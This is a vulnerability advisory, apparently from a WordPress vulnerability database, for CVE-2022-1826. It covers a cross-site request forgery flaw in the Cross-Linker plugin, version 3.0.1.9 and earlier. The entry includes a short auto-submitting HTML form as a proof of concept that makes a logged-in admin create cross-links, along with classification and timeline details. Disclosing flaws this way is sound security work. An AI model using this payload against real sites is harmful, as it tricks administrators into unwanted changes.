WordPress Plugin Vulnerabilities

Cross-Linker <= 3.0.1.9 - Arbitrary Cross-Link Creation via CSRF

Description

The plugin does not have CSRF check in place when creating Cross-Links, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-content/plugins/cross-linker/assets/process/add_link.php" method="POST">
    <input type="text" name="linker_word" value="tttttt">
    <input type="text" name="linker_uri" value="https://google.com">
    <input type="text" name="linker_attr" value="">
    <input type="text" name="linker_lang" value="-1">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
cross-linker
No known fix

References

CVE
CVE-2022-1826

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
b9dba241-d94c-4ce5-8730-445ba8005e66

Timeline

Publicly Published
2022-05-30 (about 1 years ago)
Added
2022-05-30 (about 1 years ago)
Last Updated
2023-02-25 (about 9 months ago)

Other

Published
Title
Published
2014-08-01
Title
GD Star Rating 1.9.22 - Cross-Site Request Forgery (CSRF)
Published
2023-03-28
Title
Advanced Shipment Tracking for WooCommerce <= 3.5.2 - CSRF
Published
2019-07-27
Title
Simple Membership <= 3.8.4 - Cross-Site Request Forgery (CSRF)
Published
2023-09-12
Title
Quiz And Survey Master < 8.1.16 - Cross-Site Request Forgery via 'display_results'
Published
2022-01-19
Title
AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF